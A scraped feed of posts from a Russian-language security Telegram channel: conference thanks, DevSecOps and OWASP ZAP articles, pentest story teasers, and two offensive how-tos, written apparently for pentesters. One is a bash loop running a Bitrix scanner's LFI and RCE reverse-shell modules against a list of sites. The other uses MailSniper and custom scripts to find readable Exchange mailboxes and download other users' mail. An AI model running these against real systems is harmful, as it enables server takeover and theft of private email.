Похек
Не смотря на мелкие косяки, которые есть всегда, нетворкинг и организация был на высочайшем уровне, за что отдельная благодарность Ольге Поздняк и всей её команде, включая волонтёров, которые приложили максимум усилий к организации этой конференции.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8❤5🔥2🤣1
Forwarded from вольтаж
Пока каналы переполнены советами, крутыми тулзами и историями успеха, поделюсь рефлексией на прошедший Standoff Hacks, включая все свои #fail'ы, что из них вынес и почему интерес к ИБ разгорелся ещё сильнее.
https://teletype.in/@hackthishit/hacks-reflection
https://teletype.in/@hackthishit/hacks-reflection
Teletype
Все совершают ошибки, или как я сдал 0 багов на хаксе
В потоке эфемерных советов, крутых инструментов и историй успеха, соскучился по историям не_успеха, тупым ситуациям и мыслям об этом.
👍13 6
Похек
Quick-tricks Сканер уязвимостей Bitrix на основе руководства Атаки на Bitrix Установка: go install github.com/indigo-sadland/quick-tricks@latest Функционал: quick-tricks [command] help Справка о любой команде quick Запуск всех быстрых модулей ('recon'…
quick-tricks
9 MB
Когда-то я выкладывал пост про интересную тулзу для быстрой проверки Bitrix на наличие простых уязвимостей. И я писал, что мол написал скрипт, но с вами им не поделился 🌚
Исправляюсь! Переписал скрипт, теперь он будет бегать по всем урлам построчно и проверять на всё что только можно из этого инструмента, кроме XSS, т.к. модуль фолзит, из-за того, что нагрузка тупо вставляется и если 200, то он пишет что якобы XSS нашёл, но в 99,999% случаев, сайт просто проглотит нагрузку и ничего не случиться.
#!/bin/bash
echo "Lauch netcat for revshells"
printf "Enter IP ($(curl -s 2ip.ru)): "
read $IP
printf "Enter Port: "
read $PORT
for ((i=1; i <= $(wc -l scope.txt | awk '{print $1;}'); i++))
do
quick-tricks spoofing -u $(sed -n "$i p" scope.txt)
quick-tricks redirect -u $(sed -n "$i p" scope.txt)
quick-tricks lfi -u $(sed -n "$i p" scope.txt)
quick-tricks recon -a -u $(sed -n "$i p" scope.txt)
quick-tricks rce vote-agent -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT --agentId 2
quick-tricks rce vote-agent -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT --agentId 4
quick-tricks rce vote-agent -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT --agentId 7
quick-tricks rce html-editor -u $(sed -n "$i p" scope.txt) --lhost $IP --lport $PORT
done
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13❤2❤🔥2
Please open Telegram to view this post
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
Одним из трендов этого года был DevSecOps 💻 , а также чем заменить ушедших вендоров.
Нашёл хорошую статью на эту тему🤔
Как мы в РСХБ построили ИБ-платформу с использованием OpenSource-инструментов
В рамках материала автор рассмотрел следующие вопросы:
➡️ Можно ли платформу ИБ построить бесплатно и в кратчайшие сроки?
➡️ Можно ли ASOC сделать понятным для бизнеса? Бизнес — наш основной заказчик. Понятно, что все процессы и все что мы делаем не для себя, дома ASOC нам не нужен. ИБ‑специалистам это тоже не нужно, все это нужно бизнес‑заказчику. Поэтому нужно сделать платформу, которая будет понятна всем.
➡️ Как оптимизировать процессы ИБ, сократив Time‑to‑Market до минимума? Меня сразу поставили в определенные рамки: проверки практик DevSecOps в CI/CD не должны занимать больше 10–15 минут. Нужно как‑то вписаться в них.
➡️ Как оценить жизненный цикл уязвимости и эффективность работы специалистов ИБ?
➡️ Как подготовиться к включению QG так, чтобы ни один из разработчиков не пострадал?
🌚 @poxek
Нашёл хорошую статью на эту тему
Как мы в РСХБ построили ИБ-платформу с использованием OpenSource-инструментов
В рамках материала автор рассмотрел следующие вопросы:
Please open Telegram to view this post
VIEW IN TELEGRAM
Похек
Одним из трендов этого года был DevSecOps 💻 , а также чем заменить ушедших вендоров. Нашёл хорошую статью на эту тему 🤔 Как мы в РСХБ построили ИБ-платформу с использованием OpenSource-инструментов В рамках материала автор рассмотрел следующие вопросы: ➡️ …
This media is not supported in your browser
VIEW IN TELEGRAM
С вами инженерный отдел по динамическому анализу Swordfish Security. Продолжаем разбирать полезные кейсы, и сегодня мы рассмотрим, как в DAST-сканере OWASP ZAP настроить автоматическую авторизацию в приложении и переиспользовать ее в дальнейших сканированиях.
OWASP ZAP (Zed Attack Proxy) — один из самых популярных инструментов для проверки безопасности веб-приложений. У него широкий диапазон возможностей для обнаружения уязвимостей. Однако, прежде чем начать сканирование, необходимо правильно настроить инструмент, в том числе и авторизацию, чтобы тестировать приложение с одной или нескольких учетных записей.
В комментариях к предыдущем посту про DevSecOps подметили, что в статье ничего не говорилось про DAST. А зря
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6🔥4 3🫡1 1
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥13 2
This media is not supported in your browser
VIEW IN TELEGRAM
Сегодня расскажу про внутренний пентест, в ходе которого мы без учетной записи добрались до администратора домена.
В этом проекте использовались много разнообразных техник: от декомпиляции приложения и расшифровки извлеченных учетных данных, до повышения привилегий через базу данных на сервере и сбора информации от имени учетной записи компьютера. Под катом подробно разобрано, как они сложились в успешный вектор атаки.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8👍5
Forwarded from true_security
list.png
45.3 KB
Первой публикацией я хотел бы поделиться интересной историей про ms exchange.
Пользователи могут управлять разрешениями на доступ к каталогам своей электронной почты.
Это может делать и почтовый администратор.
При получении доступа к одной эл.почте мы можем проверить права доступа к чужим эл.ящикам:
!!!Важно, ваша учетная запись должна иметь доступ по протоколу ews!!!
1) выгрузить список всех адресов из глобальной адресной книги:
например, через MailSniper.ps1 (https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1)
2) запустить проверку прав доступа через мой скрипт:
https://github.com/feedb/ebussing/blob/main/ge.py
в файлу gal.txt у вас должна находиться адреса эл.почты
Будут выводиться записи root, где то будет отображаться дерево как на скриншоте.
Наличие дерева подразумевает доступ вашей учетной записи к каталогам и их содержимому эл.ящика (см.скриншот)
3) находим почты с разрешенным доступом и выгружаем содержимое каталога входящих писем скриптом:
https://github.com/feedb/ebussing/blob/main/download.py
в emails.txt складываем почты в которых есть доступ к inbox/входящие, создаем каталог out
и запускаем
В каталоге out будут сохраняться eml чужих сообщений
P.s. скрипты написаны на коленке, в новой версии будут параметры и т.д.
Пользователи могут управлять разрешениями на доступ к каталогам своей электронной почты.
Это может делать и почтовый администратор.
При получении доступа к одной эл.почте мы можем проверить права доступа к чужим эл.ящикам:
!!!Важно, ваша учетная запись должна иметь доступ по протоколу ews!!!
1) выгрузить список всех адресов из глобальной адресной книги:
например, через MailSniper.ps1 (https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1)
Get-GlobalAddressList -ExchHostname owa.server.com -UserName domain\user -Password password123 -OutFile gal.txt
2) запустить проверку прав доступа через мой скрипт:
https://github.com/feedb/ebussing/blob/main/ge.py
в файлу gal.txt у вас должна находиться адреса эл.почты
python3 ge.py
Будут выводиться записи root, где то будет отображаться дерево как на скриншоте.
Наличие дерева подразумевает доступ вашей учетной записи к каталогам и их содержимому эл.ящика (см.скриншот)
3) находим почты с разрешенным доступом и выгружаем содержимое каталога входящих писем скриптом:
https://github.com/feedb/ebussing/blob/main/download.py
в emails.txt складываем почты в которых есть доступ к inbox/входящие, создаем каталог out
и запускаем
python3 get.py
В каталоге out будут сохраняться eml чужих сообщений
P.s. скрипты написаны на коленке, в новой версии будут параметры и т.д.
🔥8😈1
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13
Один мой очень хороший знакомый занимается физическим пентестом (сокр. физикой). Мало того, что у него очень интересный бекграунд, так он проворачивает анализы защищенности не хуже, чем в фильмах "Миссия невыполнима". Поэтому особенно советую прочитать его надеюсь последний в этом году, но не последний в будущем физический пентест.
Please open Telegram to view this post
VIEW IN TELEGRAM
Teletype
ВЗЛОМ НА ВЫСОТЕ
Хотелось бы отметить что данный заказчик оказался достаточно крутым, развязал руки на полную имитацию действия APT.
🔥18❤5👍5👎2⚡1
Большое спасибо вам за сами подарки, за душевные и интересные мероприятия в этом году, за прекрасное обновление платформы BI.ZONE BugBounty
И отдельное спасибо ENZO, как от администратора канала, за приятную связь с админами телеграм каналов)
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍21🔥8🥰3❤2👎2 2❤🔥1